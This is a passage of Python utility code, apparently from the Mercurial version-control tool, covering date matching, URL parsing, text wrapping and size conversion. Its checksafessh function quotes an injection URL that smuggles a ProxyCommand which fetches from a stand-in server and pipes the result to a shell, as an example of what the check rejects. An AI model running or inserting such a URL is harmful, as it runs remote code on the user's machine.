        when, offset = map(int, date.split(' '))
    except ValueError:
        # fill out defaults
        now = makedate()
        defaults = {}
        for part in ("d", "mb", "yY", "HI", "M", "S"):
            # this piece is for rounding the specific end of unknowns
            b = bias.get(part)
            if b is None:
                if part[0] in "HMS":
                    b = "00"
                else:
                    b = "0"

            # this piece is for matching the generic end to today's date
            n = datestr(now, "%" + part[0])

            defaults[part] = (b, n)

        for format in formats:
            try:
                when, offset = strdate(date, format, defaults)
            except (ValueError, OverflowError):
                pass
            else:
                break
        else:
            raise Abort(_('invalid date: %r') % date)
    # validate explicit (probably user-specified) date and
    # time zone offset. values must fit in signed 32 bits for
    # current 32-bit linux runtimes. timezones go from UTC-12
    # to UTC+14
    if when < -0x80000000 or when > 0x7fffffff:
        raise Abort(_('date exceeds 32 bits: %d') % when)
    if offset < -50400 or offset > 43200:
        raise Abort(_('impossible time zone offset: %d') % offset)
    return when, offset

def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate("10:29:59")
    >>> p2 = parsedate("10:30:00")
    >>> p3 = parsedate("10:30:59")
    >>> p4 = parsedate("10:31:00")
    >>> p5 = parsedate("Sep 15 10:30:00 1999")
    >>> f = matchdate("10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except Abort:
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop

def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test('abcdefg', 'abc', 'def', 'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test('literal:re:foobar', 'foobar', 're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            flags = 0
            if not casesensitive:
                flags = remod.I
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search
    elif pattern.startswith('literal:'):
        pattern = pattern[8:]

    match = pattern.__eq__

    if not casesensitive:
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match

def shortuser(user):
    """Return a short representation of a user name or email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    f = user.find(' ')
    if f >= 0:
        user = user[:f]
    f = user.find('.')
    if f >= 0:
        user = user[:f]
    return user

def emailuser(user):
    """Return the user portion of an email address."""
    f = user.find('@')
    if f >= 0:
        user = user[:f]
    f = user.find('<')
    if f >= 0:
        user = user[f + 1:]
    return user

def email(author):
    '''get email of author.'''
    r = author.find('>')
    if r == -1:
        r = None
    return author[author.find('<') + 1:r]

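# Illustrative usage sketch (an editor's addition, not upstream code): the
# three helpers above extract progressively shorter forms of an author
# string; the sample address is hypothetical:
#
#     email('Joe User <joe.user@example.com>')      # -> 'joe.user@example.com'
#     emailuser('Joe User <joe.user@example.com>')  # -> 'joe.user'
#     shortuser('Joe User <joe.user@example.com>')  # -> 'joe'
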
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    return encoding.trim(text, maxlength, ellipsis='...')

def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go

def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline

bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )

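# Illustrative usage sketch (an editor's addition, not upstream code):
# bytecount picks the first row whose threshold (multiplier * divisor) the
# value reaches, so displayed precision decreases as magnitude grows:
#
#     bytecount(100)        # -> '100 bytes'
#     bytecount(100000)     # -> '97.7 KB'
#     bytecount(15 << 20)   # -> '15.0 MB'
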
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    return _eolre.sub('\n', s)

def tocrlf(s):
    return _eolre.sub('\r\n', s)

if pycompat.oslinesep == '\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity

def escapestr(s):
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility
    return codecs.escape_encode(s)[0]

def unescapestr(s):
    return codecs.escape_decode(s)[0]

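# Illustrative usage sketch (an editor's addition, not upstream code):
# escapestr and unescapestr round-trip a byte string through Python
# string-escape notation, keeping control characters printable:
#
#     escapestr('foo\nbar\x00')   # -> 'foo\\nbar\\x00'
#     unescapestr('foo\\nbar')    # -> 'foo\nbar'
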
def uirepr(s):
    # Avoid double backslash in Windows path repr()
    return repr(s).replace('\\\\', '\\')

# delay import of textwrap
def MBTextWrapper(**kwargs):
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither the number of 'bytes' in any encoding nor the number of
        'characters' is appropriate for calculating the terminal columns
        of a given string.

        The original TextWrapper implementation uses the built-in 'len()'
        directly, so overriding is needed to use the width information of
        each character.

        In addition, characters classified as 'ambiguous' width are
        treated as wide in East Asian locales, but as narrow elsewhere.
        Determining the width of such characters therefore requires a
        decision by the user.
        """
        def _cutdown(self, ucstr, space_left):
            l = 0
            colwidth = encoding.ucolwidth
            for i in xrange(len(ucstr)):
                l += colwidth(ucstr[i])
                if space_left < l:
                    return (ucstr[:i], ucstr[i:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                cut, res = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(cut)
                reversed_chunks[-1] = res
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            lines = []
            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                if lines:
                    indent = self.subsequent_indent
                else:
                    indent = self.initial_indent

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == '' and lines:
                    del chunks[-1]

                while chunks:
                    l = colwidth(chunks[-1])

                    # Can at least squeeze this chunk onto the current line.
                    if cur_len + l <= width:
                        cur_line.append(chunks.pop())
                        cur_len += l

                    # Nope, this line is full.
                    else:
                        break

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == ''):
                    del cur_line[-1]

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + ''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)

def wrap(line, width, initindent='', hangindent=''):
    maxindent = max(len(hangindent), len(initindent))
    if width <= maxindent:
        # adjust for weird terminal size
        width = max(78, maxindent + 1)
    line = line.decode(pycompat.sysstr(encoding.encoding),
                       pycompat.sysstr(encoding.encodingmode))
    initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
                                   pycompat.sysstr(encoding.encodingmode))
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))

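# Illustrative usage sketch (an editor's addition, not upstream code):
# wrap() reflows a byte string to the given display width, with separate
# first-line and hanging indents, both counted against the width. With
# plain ASCII input, something like:
#
#     wrap('a b c d e f', width=5, initindent='', hangindent='  ')
#     # -> 'a b c\n  d e\n  f'
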
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = ''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if '\n' in buf:
                    splitted = line.splitlines(True)
                    line = ''
                    for l in splitted:
                        if l[-1] == '\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp

def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line

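# Illustrative usage sketch (an editor's addition, not upstream code):
# iterlines re-chunks an iterator of text blocks into individual lines.
# Each chunk is split independently, so a line spanning two chunks would
# be yielded as two pieces:
#
#     list(iterlines(['a\nb\n', 'c\nd\n']))   # -> ['a', 'b', 'c', 'd']
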
def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))

def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if mainfrozen():
        if getattr(sys, 'frozen', None) == 'macosx_app':
            # Env variable set by py2app
            return [encoding.environ['EXECUTABLEPATH']]
        else:
            return [pycompat.sysexecutable]
    return gethgcmd()

def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent waits on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        terminated.add(os.wait())
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        if prevhandler is not None:
            signal.signal(signal.SIGCHLD, prevhandler)

def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.
    """
    fn = fn or (lambda s: s)
    patterns = '|'.join(mapping.keys())
    if escape_prefix:
        patterns += '|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(r'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)

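# Illustrative usage sketch (an editor's addition, not upstream code):
# interpolate() does a single-pass regex substitution of prefixed
# placeholders; the mapping keys here are hypothetical and must be
# regex-safe, since they are joined into an alternation:
#
#     interpolate('%', {'user': 'alice', 'repo': 'hg'},
#                 'pushed to %repo by %user')
#     # -> 'pushed to hg by alice'
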
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(port)
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)

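# Illustrative usage sketch (an editor's addition, not upstream code):
#
#     getport(8000)       # -> 8000 (integers pass through)
#     getport('8000')     # -> 8000
#     getport('http')     # -> 80 on typical systems, via getservbyname()
#     getport('no-such-service')   # raises error.Abort
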
2555 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2555 _booleans = {'1': True, 'yes': True, 'true': True, 'on': True, 'always': True,
2556 '0': False, 'no': False, 'false': False, 'off': False,
2556 '0': False, 'no': False, 'false': False, 'off': False,
2557 'never': False}
2557 'never': False}
2558
2558
2559 def parsebool(s):
2559 def parsebool(s):
2560 """Parse s into a boolean.
2560 """Parse s into a boolean.
2561
2561
2562 If s is not a valid boolean, returns None.
2562 If s is not a valid boolean, returns None.
2563 """
2563 """
2564 return _booleans.get(s.lower(), None)
2564 return _booleans.get(s.lower(), None)
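
# Illustrative sketch (not part of the original module): parsing is
# case-insensitive and unknown values yield None rather than an error:
#
#   parsebool('on')     -> True
#   parsebool('Never')  -> False
#   parsebool('maybe')  -> None  (caller decides how to report bad input)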

_hextochr = dict((a + b, chr(int(a + b, 16)))
                 for a in string.hexdigits for b in string.hexdigits)

class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url('http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url('ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url('file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url('file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url('bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url('bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(r'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(r'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(r'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(r'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url('ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url('ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url('http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url('http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url('')
    <url path: ''>
    >>> url('#a')
    <url path: '', fragment: 'a'>
    >>> url('http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url('http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url('http:')
    <url scheme: 'http'>
    """

    _safechars = "!~*'()+"
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                parts = path[2:].split('/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (self.host and ':' in self.host and
                not (self.host.startswith('[') and self.host.endswith(']'))):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(':', 1)
                if not self.host:
                    self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for a in ('user', 'passwd', 'host', 'port',
                  'path', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    def __repr__(self):
        attrs = []
        for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                  'query', 'fragment'):
            v = getattr(self, a)
            if v is not None:
                attrs.append('%s: %r' % (a, v))
        return '<url %s>' % ', '.join(attrs)

    def __str__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> str(url('http://localhost:80//'))
        'http://localhost:80//'
        >>> str(url('http://localhost:80/'))
        'http://localhost:80/'
        >>> str(url('http://localhost:80'))
        'http://localhost:80/'
        >>> str(url('bundle:foo'))
        'bundle:foo'
        >>> str(url('bundle://../foo'))
        'bundle:../foo'
        >>> str(url('path'))
        'path'
        >>> str(url('file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> str(url('file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print url(r'bundle:foo\bar')
        bundle:foo\bar
        >>> print url(r'file:///D:\data\hg')
        file:///D:\data\hg
        """
        return encoding.strfromlocal(self.__bytes__())

    def __bytes__(self):
        if self._localpath:
            s = self.path
            if self.scheme == 'bundle':
                s = 'bundle:' + s
            if self.fragment:
                s += '#' + self.fragment
            return s

        s = self.scheme + ':'
        if self.user or self.passwd or self.host:
            s += '//'
        elif self.scheme and (not self.path or self.path.startswith('/')
                              or hasdriveletter(self.path)):
            s += '//'
            if hasdriveletter(self.path):
                s += '/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += '@'
        if self.host:
            if not (self.host.startswith('[') and self.host.endswith(']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += ':' + urlreq.quote(self.port)
        if self.host:
            s += '/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += '?' + self.query
        if self.fragment is not None:
            s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host),
                    self.user, self.passwd or ''))

    def isabs(self):
        if self.scheme and self.scheme != 'file':
            return True # remote URL
        if hasdriveletter(self.path):
            return True # absolute for our purposes - can't be joined()
        if self.path.startswith(r'\\'):
            return True # Windows UNC path
        if self.path.startswith('/'):
            return True # POSIX-style
        return False

    def localpath(self):
        if self.scheme == 'file' or self.scheme == 'bundle':
            path = self.path or '/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + '/' + self.path
            elif (self.host is not None and self.path
                  and not hasdriveletter(path)):
                path = '/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (not self.scheme or self.scheme == 'file'
                or self.scheme == 'bundle')
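
# Illustrative sketch (not part of the original module): parsing splits a URL
# into attributes (note that port stays a string), and authinfo() rebuilds it
# without credentials for the password manager:
#
#   u = url('https://joe:secret@example.com:8080/repo?x=1')
#   u.scheme, u.user, u.passwd  -> ('https', 'joe', 'secret')
#   u.host, u.port, u.path      -> ('example.com', '8080', 'repo')
#   u.authinfo()[0]             -> 'https://example.com:8080/repo?x=1'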

def hasscheme(path):
    return bool(url(path).scheme)

def hasdriveletter(path):
    return path and path[1:2] == ':' and path[0:1].isalpha()

def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()

def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploited urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if (path.startswith('ssh://-') or path.startswith('svn+ssh://-')
        or '|' in path):
        raise error.Abort(_('potentially unsafe url: %r') %
                          (path,))
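
# Illustrative sketch (not part of the original module): with the svn+ssh
# check added above, option-injection urls are rejected for both schemes,
# while ordinary ssh urls pass (the unquote also catches percent-encoded '|'):
#
#   checksafessh('ssh://-oProxyCommand=curl${IFS}bad.server|sh/path')      # Abort
#   checksafessh('svn+ssh://-oProxyCommand=curl${IFS}bad.server|sh/path')  # Abort
#   checksafessh('ssh://user@host/path')                                   # ok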

def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = '***'
    return bytes(u)

def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return str(u)
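
# Illustrative sketch (not part of the original module):
#
#   hidepassword('http://joe:secret@example.com/repo')
#       -> 'http://joe:***@example.com/repo'
#   removeauth('http://joe:secret@example.com/repo')
#       -> 'http://example.com/repo'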

timecount = unitcountfn(
    (1, 1e3, _('%.0f s')),
    (100, 1, _('%.1f s')),
    (10, 1, _('%.2f s')),
    (1, 1, _('%.3f s')),
    (100, 0.001, _('%.1f ms')),
    (10, 0.001, _('%.2f ms')),
    (1, 0.001, _('%.3f ms')),
    (100, 0.000001, _('%.1f us')),
    (10, 0.000001, _('%.2f us')),
    (1, 0.000001, _('%.3f us')),
    (100, 0.000000001, _('%.1f ns')),
    (10, 0.000000001, _('%.2f ns')),
    (1, 0.000000001, _('%.3f ns')),
    )

_timenesting = [0]

def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

        @util.timed
        def foo(a, b, c):
            pass
    '''

    def wrapper(*args, **kwargs):
        start = timer()
        indent = 2
        _timenesting[0] += indent
        try:
            return func(*args, **kwargs)
        finally:
            elapsed = timer() - start
            _timenesting[0] -= indent
            stderr.write('%s%s: %s\n' %
                         (' ' * _timenesting[0], func.__name__,
                          timecount(elapsed)))
    return wrapper

_sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
              ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))

def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint('30')
    30
    >>> sizetoint('2.2kb')
    2252
    >>> sizetoint('6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[:-len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_("couldn't parse size: %s") % s)

class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results
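
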